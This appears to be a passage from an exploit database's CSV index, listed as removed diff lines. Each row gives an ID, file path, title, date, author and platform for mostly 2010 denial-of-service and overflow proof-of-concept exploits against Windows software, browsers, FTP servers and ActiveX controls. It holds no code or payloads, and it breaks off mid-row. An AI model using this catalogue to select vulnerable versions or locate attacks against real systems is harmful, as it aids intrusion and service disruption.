-12027,exploits/windows/dos/12027.py,"DSEmu 0.4.10 - '.nds' Local Crash",2010-04-03,l3D,windows,dos, -12030,exploits/windows/dos/12030.html,"IncrediMail 2.0 - ActiveX (Authenticate) Buffer Overflow (PoC)",2010-04-03,d3b4g,windows,dos, -12032,exploits/windows/dos/12032.html,"Microsoft Internet Explorer Tabular Data Control - ActiveX Remote Code Execution",2010-04-03,ZSploit.com,windows,dos, -12072,exploits/windows/dos/12072.pl,"MyVideoConverter 2.15 - Local Denial of Service",2010-04-05,anonymous,windows,dos, -12073,exploits/windows/dos/12073.pl,"MP3 Wav Editor 3.80 - '.mp3' Local Denial of Service",2010-04-05,anonymous,windows,dos, -12074,exploits/windows/dos/12074.pl,"Portable AVS DVD Authoring 1.3.3.51 - Local Crash (PoC)",2010-04-05,R3d-D3V!L,windows,dos, -12079,exploits/windows/dos/12079.pl,"Microsoft Office 2010 Beta - Communicator SIP Denial of Service",2010-04-06,indoushka,windows,dos, -12080,exploits/windows/dos/12080.txt,"Foxit Reader 3.2.1.0401 - Denial of Service",2010-04-06,juza,windows,dos, -12081,exploits/windows/dos/12081.php,"Jzip 1.3 - '.zip' Unicode Buffer Overflow (PoC)",2010-04-06,mr_me,windows,dos, -12093,exploits/hardware/dos/12093.txt,"McAfee Email Gateway (formerly IronMail) - Denial of Service",2010-04-06,"Nahuel Grisolia",hardware,dos, -12095,exploits/linux/dos/12095.txt,"Virata EmWeb R6.0.1 - Remote Crash",2010-04-06,"Jobert Abma",linux,dos, -12096,exploits/windows/dos/12096.txt,"Juke 4.0.2 - Denial of Service Multiple Files",2010-04-06,anonymous,windows,dos, -12104,exploits/windows/dos/12104.py,"Anyzip 1.1 - '.zip' (PoC) (SEH)",2010-04-07,ITSecTeam,windows,dos, -12109,exploits/multiple/dos/12109.txt,"Multiple Vendor 'librpc.dll' Signedness Error - Remote Code Execution",2010-04-08,ZSploit.com,multiple,dos, -12110,exploits/windows/dos/12110.pl,"CompleteFTP 3.3.0 - Remote Memory Consumption Denial of Service",2010-04-08,"Jonathan Salwan",windows,dos, -12131,exploits/windows/dos/12131.py,"Tembria Server Monitor 5.6.0 - Denial of Service",2010-04-09,Lincoln,windows,dos, -12154,exploits/php/dos/12154.txt,"vBulletin (Cyb - Advanced Forum Statistics) - 'misc.php' Denial of Service",2010-04-10,"Andhra Hackers",php,dos, -12161,exploits/windows/dos/12161.pl,"Aladdin eToken PKI Client 4.5 - Virtual File Handling Memory Corruption (PoC)",2010-04-11,LiquidWorm,windows,dos, -12165,exploits/multiple/dos/12165.txt,"PHP 5.3.0 - 'getopt()' Denial of Service",2010-04-12,Napst3r,multiple,dos, -12188,exploits/multiple/dos/12188.txt,"VMware Remote Console e.x.p build-158248 - Format String",2010-04-12,"Alexey Sintsov",multiple,dos, -12201,exploits/windows/dos/12201.html,"MagnetoSoft DNS 4.0.0.9 - ActiveX DNSLookupHostWithServer (PoC)",2010-04-13,s4squatch,windows,dos, -12204,exploits/windows/dos/12204.html,"MagnetoSoft SNTP 4.0.0.7 - ActiveX SntpSendRequest Crash (PoC)",2010-04-13,s4squatch,windows,dos, -12205,exploits/windows/dos/12205.html,"MagnetoSoft NetworkResources 4.0.0.5 - ActiveX NetSessionDel (PoC)",2010-04-13,s4squatch,windows,dos, -12206,exploits/windows/dos/12206.html,"MagnetoSoft NetworkResources 4.0.0.5 - ActiveX NetFileClose Overwrite (SEH) (PoC)",2010-04-13,s4squatch,windows,dos, -12207,exploits/windows/dos/12207.html,"MagnetoSoft NetworkResources 4.0.0.5 - ActiveX NetShareEnum Overwrite (SEH) (PoC)",2010-04-13,s4squatch,windows,dos, -12208,exploits/windows/dos/12208.html,"MagnetoSoft NetworkResources - ActiveX NetConnectionEnum Overwrite (SEH) (PoC)",2010-04-13,s4squatch,windows,dos, -12217,exploits/multiple/dos/12217.py,"Aircrack-NG Tools svn r1675 - Remote Heap-Based Buffer Overflow",2010-04-14,"Lukas Lueg",multiple,dos, -12228,exploits/windows/dos/12228.py,"MovieLibrary 1.4.401 - '.dmv' Local Denial of Service",2010-04-14,anonymous,windows,dos, -12229,exploits/windows/dos/12229.py,"Book Library 1.4.162 - '.bkd' Local Denial of Service",2010-04-14,anonymous,windows,dos, -12240,exploits/windows/dos/12240.py,"Mocha LPD 1.9 - Remote Buffer Overflow Denial of Service (PoC)",2010-04-14,mr_me,windows,dos, -15732,exploits/linux/dos/15732.txt,"FontForge - '.BDF' Font File Stack Based Buffer Overflow",2010-12-14,"Ulrik Persson",linux,dos, -12243,exploits/windows/dos/12243.py,"RPM Select/Elite 5.0 - '.xml Configuration parsing' Unicode Buffer Overflow (PoC)",2010-04-14,mr_me,windows,dos, -12252,exploits/hardware/dos/12252.txt,"IBM Bladecenter Management Module - Denial of Service",2010-04-15,"Alexey Sintsov",hardware,dos, -12258,exploits/windows/dos/12258.py,"Microsoft Windows - SMB Client-Side Bug (PoC) (MS10-006)",2010-04-16,"laurent gaffie",windows,dos, -12259,exploits/php/dos/12259.php,"PHP 5.3.x - Denial of Service",2010-04-16,ITSecTeam,php,dos, -12273,exploits/windows/dos/12273.py,"Microsoft Windows 7/2008 R2 - SMB Client Trans2 Stack Overflow (MS10-020) (PoC)",2010-04-17,"laurent gaffie",windows,dos, -12274,exploits/windows/dos/12274.py,"Multiple Vendor AgentX++ - Stack Buffer Overflow",2010-04-17,ZSploit.com,windows,dos, -12294,exploits/windows/dos/12294.txt,"Avtech Software - ActiveX 'avc781viewer.dll' Multiple Vulnerabilities",2010-04-19,LiquidWorm,windows,dos, -12297,exploits/hardware/dos/12297.txt,"Huawei EchoLife HG520c - Modem Reset (Denial of Service)",2010-04-19,hkm,hardware,dos, -12302,exploits/windows/dos/12302.html,"HP Operations Manager 8.16 - 'srcvw4.dll' 'LoadFile()'/'SaveFile()' Remote Unicode Stack Overflow (PoC)",2010-04-20,mr_me,windows,dos, -12314,exploits/windows/dos/12314.py,"Speed Commander 13.10 - '.zip' Memory Corruption",2010-04-20,TecR0c,windows,dos, -12324,exploits/multiple/dos/12324.py,"Multiple Browsers - Audio Tag Denial of Service",2010-04-21,"Chase Higgins",multiple,dos, -12334,exploits/linux/dos/12334.c,"OpenSSL - Remote Denial of Service",2010-04-22,Andi,linux,dos, -12336,exploits/windows/dos/12336.c,"Microsoft Windows XP/2000/2003 - 'win32k.sys' SfnLOGONNOTIFY Local kernel Denial of Service",2010-04-22,MJ0011,windows,dos, -12337,exploits/windows/dos/12337.c,"Microsoft Windows XP/2000/2003 - 'win32k.sys' SfnINSTRING Local kernel Denial of Service",2010-04-22,MJ0011,windows,dos, -12341,exploits/windows/dos/12341.txt,"EDraw Flowchart ActiveX Control 2.3 - 'EDImage.ocx' Remote Denial of Service (IE)",2010-04-22,LiquidWorm,windows,dos, -12344,exploits/hardware/dos/12344.txt,"Apple iPhone 3.1.2 - '7D11' Model MB702LL Mobile Safari Denial of Service",2010-04-19,"Matthew Bergin",hardware,dos, -12356,exploits/windows/dos/12356.c,"CommView 6.1 (Build 636) - Local Blue Screen of Death (Denial of Service)",2010-04-23,p4r4N0ID,windows,dos, -12375,exploits/osx/dos/12375.c,"Apple Mac OSX 10.6 - HFS FileSystem (Denial of Service)",2010-04-24,"Maksymilian Arciemowicz",osx,dos, -12382,exploits/multiple/dos/12382.txt,"Invision Power Board - Denial of Service",2010-04-25,SeeMe,multiple,dos, -12401,exploits/multiple/dos/12401.html,"WebKit 532.5 - Stack Exhaustion",2010-04-26,"Mathias Karlsson",multiple,dos, -12408,exploits/windows/dos/12408.pl,"Apple Safari 4.0.5 (531.22.7) - Denial of Service",2010-04-26,"Xss mAn",windows,dos, -12422,exploits/windows/dos/12422.pl,"Acoustica 3.32 CD/DVD Label Maker - '.m3u' (PoC)",2010-04-27,chap0,windows,dos, -12425,exploits/windows/dos/12425.html,"Webkit (Apple Safari 4.0.5) - Blink Tag Stack Exhaustion Denial of Service",2010-04-27,Dr_IDE,windows,dos, -12431,exploits/windows/dos/12431.html,"Webmoney Advisor - ActiveX Remote Denial of Service",2010-04-28,Go0o$E,windows,dos, -12437,exploits/windows/dos/12437.html,"Apple Safari 4.0.3/4.0.4 - Stack Exhaustion",2010-04-28,"Fredrik Nordberg Almroth",windows,dos, -12457,exploits/win_x86/dos/12457.txt,"Apple Safari 4.0.3 (Windows x86) - 'CSS' Remote Denial of Service (2)",2010-04-29,ITSecTeam,win_x86,dos, -12477,exploits/windows/dos/12477.txt,"Google Chrome 4.1.249.1064 - Remote Memory Corrupt",2010-05-01,eidelweiss,windows,dos, -12482,exploits/windows/dos/12482.py,"TFTPGUI - Long Transport Mode Overflow",2010-05-02,"Jeremiah Talamantes",windows,dos, -12487,exploits/windows/dos/12487.html,"Apple Safari 4.0.5 - 'JavaScriptCore.dll' Stack Exhaustion",2010-05-03,"Mathias Karlsson",windows,dos, -12491,exploits/multiple/dos/12491.html,"All browsers - Crash",2010-05-03,Inj3ct0r,multiple,dos, -12492,exploits/windows/dos/12492.html,"Mozilla Firefox 3.6.3 - Fork Bomb (Denial of Service)",2010-05-03,Dr_IDE,windows,dos, -12493,exploits/multiple/dos/12493.html,"All Browsers - Long Unicode Denial of Service (PoC)",2010-05-03,Dr_IDE,multiple,dos, -12494,exploits/windows/dos/12494.pl,"Winamp 5.572 - Local Crash (PoC)",2010-05-03,R3d-D3V!L,windows,dos, -12508,exploits/osx/dos/12508.html,"Multiple Browsers - 'history.go()' Denial of Service",2010-05-04,Dr_IDE,osx,dos, -12509,exploits/osx/dos/12509.html,"Multiple Browsers - 'window.print()' Denial of Service",2010-05-04,Dr_IDE,osx,dos, -12518,exploits/windows/dos/12518.pl,"Microsoft Paint - Integer Overflow (Denial of Service) (MS10-005)",2010-05-06,unsign,windows,dos, -12524,exploits/windows/dos/12524.py,"Microsoft Windows - SMB2 Negotiate Protocol '0x72' Response Denial of Service",2010-05-07,"Jelmer de Hen",windows,dos, -12527,exploits/asp/dos/12527.txt,"Administrador de Contenidos - Admin Authentication Bypass",2010-05-07,Ra3cH,asp,dos, -12529,exploits/windows/dos/12529.py,"ESET Smart Security 4.2 and NOD32 AntiVirus 4.2 (x86/x64) - LZH archive parsing (PoC)",2010-05-07,"Oleksiuk Dmitry_ eSage Lab",windows,dos, -12530,exploits/windows/dos/12530.rb,"TFTPGUI 1.4.5 - Long Transport Mode Overflow Denial of Service (Metasploit)",2010-05-08,"Jeremiah Talamantes",windows,dos, -12531,exploits/windows/dos/12531.pl,"GeoHttpServer - Remote Denial of Service",2010-05-08,aviho1,windows,dos, -12541,exploits/windows/dos/12541.php,"Dolphin 2.0 - '.elf' Local Denial of Service",2010-05-09,"Yakir Wizman",windows,dos, -12546,exploits/windows/dos/12546.pl,"Hyplay 1.2.326.1 - '.asx' Local Denial of Service Crash (PoC)",2010-05-10,"Steve James",windows,dos, -12554,exploits/php/dos/12554.txt,"MiniManager For Mangos/Trinity Server - Denial of Service",2010-05-10,XroGuE,php,dos, -12555,exploits/multiple/dos/12555.txt,"Pargoon CMS - Denial of Service",2010-05-10,"Pouya Daneshmand",multiple,dos, -12564,exploits/windows/dos/12564.txt,"Microsoft Windows Outlook Express and Windows Mail - Integer Overflow",2010-05-11,"Francis Provencher",windows,dos, -12578,exploits/windows/dos/12578.c,"Adobe Shockwave Player 11.5.6.606 - 'DIR' Multiple Memory Vulnerabilities",2010-05-12,LiquidWorm,windows,dos, -12588,exploits/linux/dos/12588.txt,"Samba 3.4.7/3.5.1 - Denial of Service",2010-05-13,"laurent gaffie",linux,dos, -12602,exploits/windows/dos/12602.txt,"Mozilla Firefox 3.6.3 / Safari 4.0.5 - Access Violation Exception and Unknown Exception",2010-05-14,"Fredrik Nordberg Almroth",windows,dos, -12603,exploits/windows/dos/12603.py,"SmallFTPd 1.0.3 - 'DELE' Denial of Service",2010-05-14,"Jeremiah Talamantes",windows,dos, -12604,exploits/windows/dos/12604.py,"TYPSoft FTP Server 1.10 - 'RETR' Denial of Service (1)",2010-05-14,"Jeremiah Talamantes",windows,dos, -12605,exploits/windows/dos/12605.html,"IncrediMail - 'ImShExtU.dll' ActiveX Memory Corruption",2010-05-14,Lincoln,windows,dos, -12650,exploits/windows/dos/12650.txt,"Attachmate Reflection Standard Suite 2008 - ActiveX Buffer Overflow",2010-05-18,"Rad L. Sneak",windows,dos, -12652,exploits/netbsd_x86/dos/12652.sh,"NetBSD 5.0 - Hack GENOCIDE Environment Overflow (PoC)",2010-05-18,JMIT,netbsd_x86,dos, -12653,exploits/netbsd_x86/dos/12653.sh,"NetBSD 5.0 - Hack PATH Environment Overflow (PoC)",2010-05-18,JMIT,netbsd_x86,dos, -12655,exploits/windows/dos/12655.txt,"QtWeb Browser 3.3 - Denial of Service",2010-05-18,PoisonCode,windows,dos, -28049,exploits/windows/dos/28049.html,"GreenBrowser 6.4.0515 - Heap Overflow",2013-09-03,Asesino04,windows,dos, -28050,exploits/windows/dos/28050.txt,"Oracle Java lookUpByteBI - Heap Buffer Overflow",2013-09-03,GuHe,windows,dos, -28051,exploits/windows/dos/28051.py,"PotPlayer 1.5.39036 - '.wav' Crash (PoC)",2013-09-03,ariarat,windows,dos, -12683,exploits/windows/dos/12683.pl,"SolarWinds TFTP Server 10.4.0.10 - Denial of Service",2010-05-21,Nullthreat,windows,dos,69 -12687,exploits/windows/dos/12687.pl,"WinDirectAudio 1.0 - '.wav' (PoC)",2010-05-21,ahwak2000,windows,dos, -12698,exploits/windows/dos/12698.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - 'PORT' Remote Denial of Service",2010-05-22,Ma3sTr0-Dz,windows,dos, -12704,exploits/windows/dos/12704.txt,"Media Player Classic 1.3.1774.0 - '.rm' Buffer Overflow (PoC)",2010-05-23,"sniper ip",windows,dos, -12740,exploits/windows/dos/12740.py,"Webby WebServer - Overflow (SEH) (PoC)",2010-05-25,m-1-k-3,windows,dos, -12741,exploits/windows/dos/12741.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Universal Unauthenticated Denial of Service",2010-05-25,Dr_IDE,windows,dos, -12751,exploits/windows/dos/12751.pl,"Adobe Photoshop CS4 Extended 11.0 - '.ABR' File Handling Remote Buffer Overflow (PoC)",2010-05-26,LiquidWorm,windows,dos, -12752,exploits/windows/dos/12752.c,"Adobe Photoshop CS4 Extended 11.0 - '.GRD' File Handling Remote Buffer Overflow (PoC)",2010-05-26,LiquidWorm,windows,dos, -12753,exploits/windows/dos/12753.c,"Adobe Photoshop CS4 Extended 11.0 - '.ASL' File Handling Remote Buffer Overflow (PoC)",2010-05-26,LiquidWorm,windows,dos, -12762,exploits/freebsd/dos/12762.txt,"FreeBSD 8.0 - 'ftpd' (FreeBSD-SA-10:05) Off-By-One (PoC)",2010-05-27,"Maksymilian Arciemowicz",freebsd,dos, -12774,exploits/windows/dos/12774.py,"Home FTP Server 1.10.3 (build 144) - Denial of Service",2010-05-28,Dr_IDE,windows,dos, -12775,exploits/multiple/dos/12775.py,"VideoLAN VLC Media Player 1.0.6 - '.avi' Media File Crash (PoC)",2010-05-28,Dr_IDE,multiple,dos, -12816,exploits/windows/dos/12816.py,"ZipExplorer 7.0 - '.zar' Denial of Service",2010-05-31,TecR0c,windows,dos, -12852,exploits/windows/dos/12852.txt,"QtWeb 3.3 - Remote Crash (Denial of Service)",2010-06-03,PoisonCode,windows,dos, -12853,exploits/windows/dos/12853.py,"Quick 'n Easy FTP Server Lite 3.1 - Denial of Service",2010-06-03,b0nd,windows,dos, -40087,exploits/multiple/dos/40087.txt,"Adobe Flash - ATF Processing Overflow",2016-07-11,"Google Security Research",multiple,dos, -40088,exploits/multiple/dos/40088.txt,"Adobe Flash - JXR Processing Double-Free",2016-07-11,"Google Security Research",multiple,dos, -40089,exploits/multiple/dos/40089.txt,"Adobe Flash - LMZA Property Decoding Heap Corruption",2016-07-11,"Google Security Research",multiple,dos, -40090,exploits/multiple/dos/40090.txt,"Adobe Flash - ATF Image Packing Overflow",2016-07-11,"Google Security Research",multiple,dos, -40095,exploits/multiple/dos/40095.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (1)",2016-07-13,COSIG,multiple,dos, -18615,exploits/windows/dos/18615.py,"TYPSoft FTP Server 1.1 - 'APPE' Remote Denial of Service",2012-03-17,"brock haun",windows,dos, -15498,exploits/multiple/dos/15498.html,"Mozilla Firefox 3.6.12 - Remote Denial of Service",2010-11-12,"emgent white_sheep & scox",multiple,dos, -13774,exploits/hardware/dos/13774.pl,"Motorola SB5101 Hax0rware Rajko HTTPd - Remote Denial of Service (PoC)",2010-06-08,"Dillon Beresford",hardware,dos,80 -13775,exploits/hardware/dos/13775.pl,"Motorola SB5101 - Hax0rware Event Reset Remote Overflow",2010-06-08,"Dillon Beresford",hardware,dos,80 -13817,exploits/windows/dos/13817.pl,"Adobe InDesign CS3 - '.INDD' Handling Buffer Overflow",2010-06-11,LiquidWorm,windows,dos, -13823,exploits/hardware/dos/13823.txt,"Savy Soda Documents - Mobile Office Suite '.XLS' Denial of Service",2010-06-11,"Matthew Bergin",hardware,dos, -13824,exploits/hardware/dos/13824.txt,"Office^2 iPhone - '.XLS' Denial of Service",2010-06-11,"Matthew Bergin",hardware,dos, -13825,exploits/hardware/dos/13825.txt,"GoodiWare GoodReader iPhone - '.XLS' Denial of Service",2010-06-11,"Matthew Bergin",hardware,dos, -13836,exploits/windows/dos/13836.py,"SolarWinds TFTP Server 10.4.0.13 - Denial of Service",2010-06-12,Nullthreat,windows,dos, -13837,exploits/windows/dos/13837.pl,"Media Player Classic 1.3.1774.0 - mpcpl Local Denial of Service (PoC)",2010-06-12,R3d-D3V!L,windows,dos, -13838,exploits/windows/dos/13838.pl,"CP3 Studio PC Version - Denial of Service",2010-06-12,chap0,windows,dos, -13870,exploits/ios/dos/13870.py,"iOS QuickOffice 3.1.0 - HTTP Method Remote Denial of Service",2010-06-14,"Nishant Das Patnaik",ios,dos, -13871,exploits/ios/dos/13871.py,"iOS Impact PDF Reader 2.0 - POST Method Remote Denial of Service",2010-06-14,"Nishant Das Patnaik",ios,dos, -13872,exploits/windows/dos/13872.txt,"SumatraPDF 1.1 - Denial of Service (PoC)",2010-06-14,"Matthew Bergin",windows,dos, -13876,exploits/windows/dos/13876.py,"File Sharing Wizard 1.5.0 - Buffer Overflow (PoC)",2010-06-15,m-1-k-3,windows,dos, -13887,exploits/windows/dos/13887.c,"Winplot 2010 - Buffer Overflow (PoC)",2010-06-15,"fl0 fl0w",windows,dos, -13888,exploits/windows/dos/13888.c,"SasCam 2.6.5 - Remote HTTP Server Crash",2010-06-15,"fl0 fl0w",windows,dos, -13906,exploits/novell/dos/13906.txt,"Netware - SMB Remote Stack Overflow (PoC)",2010-06-17,"laurent gaffie",novell,dos,139 -13919,exploits/windows/dos/13919.c,"Corel VideoStudio Pro X3 - '.mp4' Buffer Overflow",2010-06-18,"fl0 fl0w",windows,dos, -13920,exploits/windows/dos/13920.c,"H264WebCam - Boundary Condition Error",2010-06-18,"fl0 fl0w",windows,dos, -13921,exploits/windows/dos/13921.c,"PowerZip 7.21 (Build 4010) - Stack Buffer Overflow",2010-06-18,"fl0 fl0w",windows,dos, -13934,exploits/windows/dos/13934.py,"MoreAmp - '.maf' Buffer Overflow (PoC)",2010-06-19,Sid3^effects,windows,dos, -13939,exploits/windows/dos/13939.pl,"Hacker Evolution Game: untold Mod Editor 2.00.001 - Buffer Overflow (PoC)",2010-06-19,gunslinger_,windows,dos, -13958,exploits/windows/dos/13958.txt,"Sysax Multi Server < 5.25 (SFTP Module) - Multiple Commands Denial of Service Vulnerabilities",2010-06-21,leinakesi,windows,dos, -13959,exploits/windows/dos/13959.c,"TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities",2010-06-21,"Luigi Auriemma",windows,dos,9987 -13965,exploits/windows/dos/13965.py,"Subtitle Translation Wizard 3.0.0 - Overflow (SEH) (PoC)",2010-06-22,blake,windows,dos, -14003,exploits/freebsd/dos/14003.c,"FreeBSD - 'mountnfs()' Denial of Service",2010-06-23,"Patroklos Argyroudis",freebsd,dos, -14010,exploits/novell/dos/14010.txt,"Novell iManager - Multiple Vulnerabilities",2010-06-24,"Core Security Technologies",novell,dos,48080 -14012,exploits/multiple/dos/14012.txt,"Weborf HTTP Server - Denial of Service",2010-06-24,Crash,multiple,dos,80 -14032,exploits/windows/dos/14032.pl,"Winstats - '.fma' Local Buffer Overflow (PoC)",2010-06-24,Madjix,windows,dos, -14036,exploits/windows/dos/14036.pl,"Geomau 7 - '.wg2' Local Buffer Overflow (PoC)",2010-06-24,Madjix,windows,dos, -14037,exploits/windows/dos/14037.pl,"Plotwn 18 - '.wp2' Local Buffer Overflow (PoC)",2010-06-24,Madjix,windows,dos, -14266,exploits/windows/dos/14266.pl,"IrcDelphi Daemon Server - Denial of Service",2010-07-08,Crash,windows,dos,6667 -14071,exploits/windows/dos/14071.pl,"FoxPlayer 2 - '.m3u' Local Buffer Overflow (PoC)",2010-06-26,Madjix,windows,dos, -14072,exploits/windows/dos/14072.c,"UltraISO 9.3.6.2750 - '.mds' / '.mdf' Buffer Overflow (PoC)",2010-06-27,"fl0 fl0w",windows,dos, -14083,exploits/linux/dos/14083.pl,"Scite Text Editor 1.76 - Local Buffer Overflow (PoC)",2010-06-27,kmkz,linux,dos, -14295,exploits/windows/dos/14295.html,"Microsoft - 'MSHTML.dll' CTIMEOUTEVENTLIST::INSERTINTOTIMEOUTLIST Memory Leak",2010-07-09,"Ruben Santamarta",windows,dos, -14099,exploits/windows/dos/14099.py,"MemDb - Multiple Remote Denial of Service Vulnerabilities",2010-06-28,Markot,windows,dos,80 -14102,exploits/windows/dos/14102.py,"Winamp 5.571 - '.avi' Denial of Service",2010-06-28,"Praveen Darshanam",windows,dos, -14121,exploits/multiple/dos/14121.c,"Adobe Reader 9.3.2 - 'CoolType.dll' Remote Memory Corruption / Denial of Service",2010-06-29,LiquidWorm,multiple,dos, -14156,exploits/windows/dos/14156.txt,"Microsoft Windows Vista/2008 - NtUserCheckAccessForIntegrityLevel Use-After-Free",2010-07-01,MSRC,windows,dos, -14175,exploits/windows/dos/14175.pl,"Mp3 Digitalbox 2.7.2.0 - '.mp3' Local Stack Overflow (PoC)",2010-07-02,v3n0m,windows,dos, -14185,exploits/multiple/dos/14185.py,"ISC DHCPD - Denial of Service",2010-07-03,sid,multiple,dos, -14236,exploits/windows/dos/14236.txt,"Sun Java Web Server 7.0 u7 - Admin Interface Denial of Service",2010-07-06,muts,windows,dos,8800 -14268,exploits/multiple/dos/14268.txt,"Qt 4.6.3 - 'QSslSocketBackendPrivate::transmit()' Denial of Service",2010-07-08,"Luigi Auriemma",multiple,dos, -14286,exploits/windows/dos/14286.txt,"Ghost Recon Advanced Warfighter - Integer Overflow / Array Indexing Overflow",2010-07-08,"Luigi Auriemma",windows,dos, -14282,exploits/windows/dos/14282.txt,"Microsoft Windows - 'cmd.exe' Unicode Buffer Overflow (SEH)",2010-07-08,bitform,windows,dos, -14290,exploits/windows/dos/14290.py,"MP3 Cutter 1.5 - Denial of Service",2010-07-09,"Prashant Uniyal",windows,dos, -15307,exploits/windows/dos/15307.py,"HP Data Protector Media Operations 6.11 - HTTP Server Remote Integer Overflow Denial of Service",2010-10-23,d0lc3,windows,dos, -14344,exploits/windows/dos/14344.c,"Corel WordPerfect Office X5 15.0.0.357 - 'wpd' Buffer Overflow (PoC)",2010-07-12,LiquidWorm,windows,dos, -14346,exploits/windows/dos/14346.txt,"Corel Presentations X5 15.0.0.357 - 'shw' Buffer Preoccupation (PoC)",2010-07-12,LiquidWorm,windows,dos, -14349,exploits/windows/dos/14349.html,"Opera - Canvas Element (Denial of Service)",2010-07-12,"Pouya Daneshmand",windows,dos, -14372,exploits/windows/dos/14372.txt,"Haihaisoft PDF Reader OCX Control 1.1.2.0 - Remote Buffer Overflow",2010-07-16,shinnai,windows,dos, -14379,exploits/multiple/dos/14379.txt,"Novell Groupwise Internet Agent - Stack Overflow",2010-07-16,"Francis Provencher",multiple,dos, -14380,exploits/windows/dos/14380.py,"Power/Personal FTP Server - RETR Denial of Service",2010-07-16,antrhacks,windows,dos, -14408,exploits/windows/dos/14408.py,"Really Simple IM 1.3beta - Denial of Service (PoC)",2010-07-18,loneferret,windows,dos, -14413,exploits/windows/dos/14413.txt,"Microsoft Internet Explorer 7 - Microsoft Clip Organizer Multiple Insecure ActiveX Control Denial of Service Vulnerabilities",2010-07-20,"Beenu Arora",windows,dos, -14414,exploits/windows/dos/14414.txt,"Unreal Tournament 3 2.1 - 'STEAMBLOB' Remote Denial of Service",2010-07-20,"Luigi Auriemma",windows,dos, -14422,exploits/multiple/dos/14422.c,"libpng 1.4.2 - Denial of Service",2010-07-20,kripthor,multiple,dos, -14424,exploits/windows/dos/14424.txt,"Lithtech Engine - Memory Corruption",2010-07-20,"Luigi Auriemma",windows,dos, -14452,exploits/linux/dos/14452.txt,"FTP Client 0.17-19build1 ACCT (Ubuntu 10.04) - Buffer Overflow",2010-07-23,d0lc3,linux,dos, -14477,exploits/windows/dos/14477.txt,"Media Player Classic - Heap Overflow / Denial of Service",2010-07-26,"Praveen Darshanam",windows,dos, -14484,exploits/windows/dos/14484.html,"Microsoft Internet Explorer 6/7 - Remote Denial of Service",2010-07-27,"Richard leahy",windows,dos, -14504,exploits/windows/dos/14504.html,"Barcodewiz BarCode ActiveX 3.29 - Denial of Service (PoC)",2010-07-30,loneferret,windows,dos, -14511,exploits/windows/dos/14511.pl,"ChordPulse 1.4 - Denial of Service",2010-07-30,Madjix,windows,dos, -14525,exploits/windows/dos/14525.pl,"Jaangle 0.98e.971 - Denial of Service",2010-08-02,s-dz,windows,dos, -14515,exploits/windows/dos/14515.pl,"Xmyplay 3.5.1 - Denial of Service",2010-07-31,s-dz,windows,dos, -14517,exploits/windows/dos/14517.pl,"Xion Audio Player 1.0.125 - Denial of Service",2010-07-31,s-dz,windows,dos, -14533,exploits/windows/dos/14533.txt,"Avast! Internet Security 5.0 - 'aswFW.sys' Kernel Driver IOCTL Memory Pool Corruption",2010-08-03,x90c,windows,dos, -14537,exploits/multiple/dos/14537.txt,"Oracle MySQL - 'ALTER DATABASE' Remote Denial of Service",2010-08-03,"Shane Bester",multiple,dos, -14545,exploits/windows/dos/14545.txt,"Progitek Visionner Photos 2.0 - File Format Denial of Service",2010-08-03,antrhacks,windows,dos, -14555,exploits/windows/dos/14555.py,"MediaMonkey 3.2.1.1297 - Denial of Service (PoC)",2010-08-05,anonymous,windows,dos, -14573,exploits/linux/dos/14573.txt,"LibTIFF - 'td_stripbytecount' Null Pointer Dereference Remote Denial of Service",2010-08-07,"Tomas Hoger",linux,dos, -14582,exploits/windows/dos/14582.pl,"ffdshow Video Codec - Denial of Service",2010-08-08,"Nishant Das Patnaik",windows,dos, -14587,exploits/windows/dos/14587.py,"Visual MP3 Splitter & Joiner 6.1 - Denial of Service",2010-08-09,"Oh Yaw Theng",windows,dos, -14584,exploits/windows/dos/14584.py,"QQ Computer Manager - 'TSKsp.sys' Local Denial of Service",2010-08-09,"Lufeng Li",windows,dos, -14593,exploits/windows/dos/14593.html,"AoAAudioExtractor 2.0.0.0 - ActiveX (PoC) (SEH)",2010-08-09,s-dz,windows,dos, -14594,exploits/linux/dos/14594.py,"Linux Kernel 2.6.33.3 - SCTP INIT Remote Denial of Service",2010-08-09,"Jon Oberheide",linux,dos, -14597,exploits/windows/dos/14597.py,"Mthree Development MP3 to WAV Decoder - Denial of Service",2010-08-10,"Oh Yaw Theng",windows,dos, -14601,exploits/windows/dos/14601.py,"Rosoft Media Player 4.4.4 - Buffer Overflow (SEH) (PoC)",2010-08-10,anonymous,windows,dos, -14607,exploits/windows/dos/14607.py,"Microsoft - SMB Server Trans2 Zero Size Pool Alloc (MS10-054)",2010-08-10,"laurent gaffie",windows,dos, -14608,exploits/windows/dos/14608.txt,"Microsoft Windows - CreateWindow Function Callback (MS10-048)",2010-08-10,"Core Security",windows,dos, -14609,exploits/windows/dos/14609.py,"Microsoft Msxml2.XMLHTTP.3.0 - Response Handling Memory Corruption (MS10-051)",2010-08-10,Skylined,windows,dos, -14611,exploits/windows/dos/14611.c,"Microsoft Windows - 'SfnLOGONNOTIFY' Privilege Escalation (MS10-048)",2010-08-10,MJ0011,windows,dos, -14613,exploits/windows/dos/14613.py,"Microsoft Windows Live Messenger 14.0.8117 - Animation Remote Denial of Service",2010-08-11,TheLeader,windows,dos, -14620,exploits/windows/dos/14620.py,"RightMark Audio Analyzer 6.2.3 - Denial of Service",2010-08-11,"Oh Yaw Theng",windows,dos, -14621,exploits/windows/dos/14621.py,"Abac Karaoke 2.15 - Denial of Service",2010-08-11,"Oh Yaw Theng",windows,dos, -14624,exploits/windows/dos/14624.py,"JaMP Player 4.2.2.0 - Denial of Service",2010-08-12,"Oh Yaw Theng",windows,dos, -14625,exploits/windows/dos/14625.py,"CombiWave Lite 4.0.1.4 - Denial of Service",2010-08-12,"Oh Yaw Theng",windows,dos, -14634,exploits/windows/dos/14634.txt,"SmartCode ServerX VNC Server ActiveX 1.1.5.0 - 'scvncsrvx.dll' Denial of Service",2010-08-13,LiquidWorm,windows,dos, -14642,exploits/windows/dos/14642.txt,"Acrobat Acrobat - Font Parsing Integer Overflow",2010-08-14,"Ramz Afzar",windows,dos, -14646,exploits/windows/dos/14646.py,"CA Advantage Ingres 2.6 - Multiple Buffer Overflow Vulnerabilities (PoC)",2010-08-14,fdiskyou,windows,dos, -14666,exploits/windows/dos/14666.txt,"Microsoft Windows - nt!NtCreateThread Race Condition with Invalid Code Segment (MS10-047)",2010-08-17,"Tavis Ormandy",windows,dos, -14667,exploits/windows/dos/14667.txt,"Microsoft Windows - KTM Invalid Free 